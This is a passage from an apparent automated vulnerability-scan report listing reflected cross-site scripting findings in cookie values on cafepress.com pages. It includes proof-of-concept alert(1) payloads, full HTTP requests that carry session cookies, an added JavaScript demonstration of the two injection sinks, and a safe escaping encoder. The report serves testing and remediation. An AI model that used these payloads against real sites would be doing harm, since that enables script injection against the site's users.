X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58850
Date: Sun, 26 Dec 2010 13:48:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'bca4a</script><script>alert(1)</script>d8d616836de'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.122. http://www.cafepress.com/make/holiday-invitations [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/holiday-invitations

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9671b"-alert(1)-"c603f1ee3b3 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability, but it is not a full one: the cookies this response sets are scoped to domain=cafepress.com and travel over plain HTTP (see the Set-Cookie headers in the response below), so if cp-v is scoped the same way, content on any cafepress.com subdomain, or an on-path attacker, could plant the value.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must reach inline script, emit it as a JSON string literal with <, >, & and the U+2028/U+2029 line terminators \u-escaped rather than concatenating it between quotes, and validate the cookie against its expected format first (the baseline cp-v value is 32 hexadecimal characters).

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 55553
Date: Sun, 26 Dec 2010 13:47:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/holiday-invitations

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c12</script><script>alert(1)</script>767fea4e030 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
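The two sinks in findings 1.122 and 1.123 fail for different reasons, and a test for one does not catch the other. The cp-v payload (9671b"-alert(1)-"c603f1ee3b3) closes the double-quoted literal and runs at the JavaScript level; the cp_st payload (22c12</script><script>alert(1)</script>767fea4e030) never leaves the single-quoted string as far as the JavaScript parser is concerned, because the HTML tokenizer has already ended the script element at the first "</script". The following is an added example, not CafePress code: it rebuilds the two templates from the response snippets (the template shapes and the session-hash prefix in s.eVar30 are assumptions), runs the check a tester would apply to each, and shows an encoder that closes both holes.

```javascript
// Added example, not CafePress code: the two inline-script sinks in this report,
// rebuilt from the response snippets (template shapes and the session-hash prefix
// are assumptions), the checks a tester would run, and a safe encoder.

// Sink A (cp_st -> tealeaf.searchTerm): single-quoted JS string.
function renderSearchTermNaive(cpSt) {
  return "window.cafepress.tealeaf.searchTerm = '" + cpSt + "';";
}

// Sink B (cp-v -> s.eVar30): double-quoted JS string, prefixed with another id.
function renderEVar30Naive(sessionHash, cpV) {
  return 's.eVar30 = "' + sessionHash + ":" + cpV + '";';
}

// Check 1: the HTML tokenizer ends a <script> element at the first "</script"
// it sees, before the JS engine parses anything, so JS quoting cannot stop the
// cp_st payload; the second <script> in the payload then runs on its own.
function escapesScriptElement(js) {
  return /<\/script/i.test(js);
}

// Check 2: execute the emitted statement with a stubbed s, alert and window and
// report whether alert() fired. This is what catches the cp-v payload: the
// quote closes the literal and "-alert(1)-" becomes arithmetic on the result.
function injectedCodeRuns(js) {
  let calls = 0;
  const win = { cafepress: { tealeaf: {} } };
  try {
    new Function("s", "alert", "window", js)({}, () => { calls += 1; }, win);
  } catch (e) {
    return false; // did not parse, or threw before reaching alert()
  }
  return calls > 0;
}

// Safe encoder: JSON string literal, then \u-escape the characters that matter
// to the HTML parser (< > &) and the JS line terminators U+2028 / U+2029.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderSearchTermSafe(cpSt) {
  return "window.cafepress.tealeaf.searchTerm = " + jsStringLiteral(cpSt) + ";";
}

function renderEVar30Safe(sessionHash, cpV) {
  return "s.eVar30 = " + jsStringLiteral(sessionHash + ":" + cpV) + ";";
}

// Round trip: run the safe output and return what the page code would see.
function evaluateSearchTerm(js) {
  const win = { cafepress: { tealeaf: {} } };
  new Function("s", "alert", "window", js)({}, () => { throw new Error("alert ran"); }, win);
  return win.cafepress.tealeaf.searchTerm;
}

// Constructed inputs: the payloads recorded in findings 1.122 and 1.123.
const CP_ST_PAYLOAD = "22c12</script><script>alert(1)</script>767fea4e030";
const CP_V_PAYLOAD = 'D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3';
const SESSION_HASH = "A8D8655B7B25F13535D4E6E67BEC27E9"; // prefix seen in s.eVar30

function demo() {
  return {
    naiveSearchTermBreaksOut: escapesScriptElement(renderSearchTermNaive(CP_ST_PAYLOAD)), // true
    naiveSearchTermRunsAsJs: injectedCodeRuns(renderSearchTermNaive(CP_ST_PAYLOAD)),       // false
    naiveEVar30RunsAsJs: injectedCodeRuns(renderEVar30Naive(SESSION_HASH, CP_V_PAYLOAD)),  // true
    safeSearchTermBreaksOut: escapesScriptElement(renderSearchTermSafe(CP_ST_PAYLOAD)),    // false
    safeEVar30RunsAsJs: injectedCodeRuns(renderEVar30Safe(SESSION_HASH, CP_V_PAYLOAD)),    // false
    safeRoundTrip: evaluateSearchTerm(renderSearchTermSafe(CP_ST_PAYLOAD)) === CP_ST_PAYLOAD, // true
  };
}

console.log(demo());
```

The JS-level execution check returns false for the cp_st payload even though the page is exploitable, which is why a scanner or unit test for script-context echoes must also look at the raw bytes for "</script" (and for "<!--" and "<script", which move the tokenizer into its escaped script-data states). Escaping every "<" in the encoder is what makes both checks pass at once.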

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=22c12</script><script>alert(1)</script>767fea4e030; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 55575
Date: Sun, 26 Dec 2010 13:47:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '22c12</script><script>alert(1)</script>767fea4e030'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/holiday-photo-cards

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744de"-alert(1)-"d438f72d6bc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 58754
Date: Sun, 26 Dec 2010 13:47:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/holiday-photo-cards

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf95</script><script>alert(1)</script>565909414f4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=acf95</script><script>alert(1)</script>565909414f4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 58776
Date: Sun, 26 Dec 2010 13:47:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'acf95</script><script>alert(1)</script>565909414f4'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /make/personalized-gifts

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c29af"-alert(1)-"a5c8b14505 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 